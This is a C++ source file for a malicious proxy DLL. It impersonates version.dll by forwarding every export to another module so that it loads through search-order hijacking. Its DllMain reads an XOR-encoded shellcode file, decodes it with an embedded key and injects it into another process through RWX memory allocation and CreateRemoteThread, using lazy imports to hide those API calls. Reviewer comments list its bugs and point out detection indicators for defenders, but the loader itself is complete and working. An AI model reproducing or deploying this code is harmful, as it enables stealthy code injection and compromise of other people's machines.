#include "pch.h"
#include <stdio.h>
#include <stdlib.h>
#include "lazy.hpp"
// NOTE(review): this define comes after <stdio.h> has already been included,
// so it cannot affect the CRT deprecation checks for fopen(); the 4996 pragma
// on the next line is what actually silences that warning.
#define _CRT_SECURE_NO_DEPRECATE
#pragma warning (disable : 4996)
// Export forwarders. Nothing below is implemented in this binary: each exported
// name is redirected to a module called "ver". The names and ordinals match the
// Windows version-info API normally served by version.dll, so a binary laid out
// this way can be loaded under that name by a search-order lookup while callers
// keep resolving their imports (the proxy-DLL layout).
// Defender note: an export table that is entirely forwarders, paired with a
// DllMain that performs file I/O and cross-process calls (see below), is a
// high-confidence static indicator. Whether "ver" actually resolves on the
// target host cannot be determined from this file alone.
#pragma comment(linker, "/export:GetFileVersionInfoA=ver.GetFileVersionInfoA,@1")
#pragma comment(linker, "/export:GetFileVersionInfoByHandle=ver.GetFileVersionInfoByHandle,@2")
#pragma comment(linker, "/export:GetFileVersionInfoExA=ver.GetFileVersionInfoExA,@3")
#pragma comment(linker, "/export:GetFileVersionInfoExW=ver.GetFileVersionInfoExW,@4")
#pragma comment(linker, "/export:GetFileVersionInfoSizeA=ver.GetFileVersionInfoSizeA,@5")
#pragma comment(linker, "/export:GetFileVersionInfoSizeExA=ver.GetFileVersionInfoSizeExA,@6")
#pragma comment(linker, "/export:GetFileVersionInfoSizeExW=ver.GetFileVersionInfoSizeExW,@7")
#pragma comment(linker, "/export:GetFileVersionInfoSizeW=ver.GetFileVersionInfoSizeW,@8")
#pragma comment(linker, "/export:GetFileVersionInfoW=ver.GetFileVersionInfoW,@9")
#pragma comment(linker, "/export:VerFindFileA=ver.VerFindFileA,@10")
#pragma comment(linker, "/export:VerFindFileW=ver.VerFindFileW,@11")
#pragma comment(linker, "/export:VerInstallFileA=ver.VerInstallFileA,@12")
#pragma comment(linker, "/export:VerInstallFileW=ver.VerInstallFileW,@13")
#pragma comment(linker, "/export:VerLanguageNameA=ver.VerLanguageNameA,@14")
#pragma comment(linker, "/export:VerLanguageNameW=ver.VerLanguageNameW,@15")
#pragma comment(linker, "/export:VerQueryValueA=ver.VerQueryValueA,@16")
#pragma comment(linker, "/export:VerQueryValueW=ver.VerQueryValueW,@17")
/*
 * In-place rolling XOR of `data` with `key`.
 *
 * The key index is reset *before* it reaches key_len - 1, so the final key
 * byte is never applied: callers that pass sizeof() of a string literal get
 * the printable bytes cycled and the NUL terminator skipped. A key_len of 0
 * or 1 never wraps and walks off the end of `key` (same as the original).
 *
 * data     buffer to transform in place (data_len bytes)
 * data_len number of bytes in data; 0 is a no-op
 * key      key bytes
 * key_len  length handed by the caller; effective cycle is key_len - 1
 */
void exclusiveor(char* data, size_t data_len, char* key, size_t key_len) {
    size_t k = 0;
    for (size_t i = 0; i < data_len; ++i) {
        // Wrap one position early: index key_len - 1 is never used.
        if (k + 1 == key_len) {
            k = 0;
        }
        data[i] ^= key[k++];
    }
}
// XOR key passed to exclusiveor() as (key, sizeof(key)). sizeof() counts the
// terminating NUL, and exclusiveor() wraps one index short of key_len, so the
// NUL is never applied and the printable bytes are cycled. Defender note: key
// material embedded as a plain string constant is a static indicator and means
// the on-disk payload can be decoded by an analyst without running the DLL.
char key[] = "kvUDb2PS0s8YZXJ4yd1gxzI5IZ6r3O2j";
/*
 * DllMain: on DLL_PROCESS_ATTACH this reads a file from the working directory,
 * XOR-decodes it with `key`, copies it into another process and starts a thread
 * on it. All of that runs under the loader lock inside DllMain, where file I/O
 * and cross-process calls are outside what the DllMain contract permits.
 *
 * Reviewer notes (documentation pass; code is unchanged):
 *  - fopen(), ftell(), malloc() and fread() results are never checked; a
 *    missing input file gives a NULL FILE* that fseek() dereferences, and a
 *    failed ftell() (-1) becomes a huge size_t.
 *  - `fp`, `shellcode` and `remoteThread` are never closed/freed (leaks).
 *  - DLL_PROCESS_ATTACH has no `break`, so it falls through into
 *    DLL_THREAD_ATTACH; harmless here because that case only breaks.
 *  - The target process id is a hard-coded constant; hModule/lpReserved and
 *    threadHandle are unused.
 *
 * Defender note: OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx with
 * PAGE_EXECUTE_READWRITE -> WriteProcessMemory -> CreateRemoteThread is the
 * textbook remote-injection sequence. An RWX allocation in a foreign process
 * followed by a remote thread whose start address is not backed by a loaded
 * module is the usual telemetry signal for it. The calls go through LI_FN,
 * presumably a lazy-import wrapper that keeps these names out of the static
 * import table — confirm against lazy.hpp.
 */
BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD reason,
    LPVOID lpReserved
)
{
    HANDLE threadHandle;  // declared but never used
    switch (reason)
    {
    case DLL_PROCESS_ATTACH:
        // Declarations after a case label without braces: legal here only
        // because none carry an initializer.
        FILE* fp;
        size_t shellcodeSize;
        unsigned char* shellcode;
        // Payload is read from a fixed file name relative to the current
        // directory of whichever process loaded this DLL; unchecked.
        fp = fopen("StagelessUpdatetcp.bin", "rb");
        fseek(fp, 0, SEEK_END);
        shellcodeSize = ftell(fp);  // -1 on failure, silently converted
        fseek(fp, 0, SEEK_SET);
        shellcode = (unsigned char*)malloc(shellcodeSize);  // unchecked
        fread(shellcode, shellcodeSize, 1, fp);  // short read not detected
        // Decode in place; sizeof(key) includes the NUL, which exclusiveor()
        // skips by wrapping one index early.
        exclusiveor((char*)shellcode, shellcodeSize, key, sizeof(key));
        HANDLE processHandle;
        HANDLE remoteThread;
        PVOID remoteBuffer;
        // Hard-coded target pid; full-access handle, result unchecked.
        processHandle = LI_FN(OpenProcess)(PROCESS_ALL_ACCESS, FALSE, DWORD(3420)); //Create proc handle
        // RWX allocation in the remote process — the first of the classic
        // injection indicators; unchecked for NULL.
        remoteBuffer = LI_FN(VirtualAllocEx)(processHandle, nullptr, shellcodeSize, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
        LI_FN(WriteProcessMemory)(processHandle, remoteBuffer, shellcode, shellcodeSize, nullptr); //Lazy function
        // Remote thread started at an address not backed by any module.
        remoteThread = LI_FN(CreateRemoteThread)(processHandle, nullptr, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, nullptr, 0, nullptr);
        CloseHandle(processHandle);
        // No `break`: falls through into DLL_THREAD_ATTACH.
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}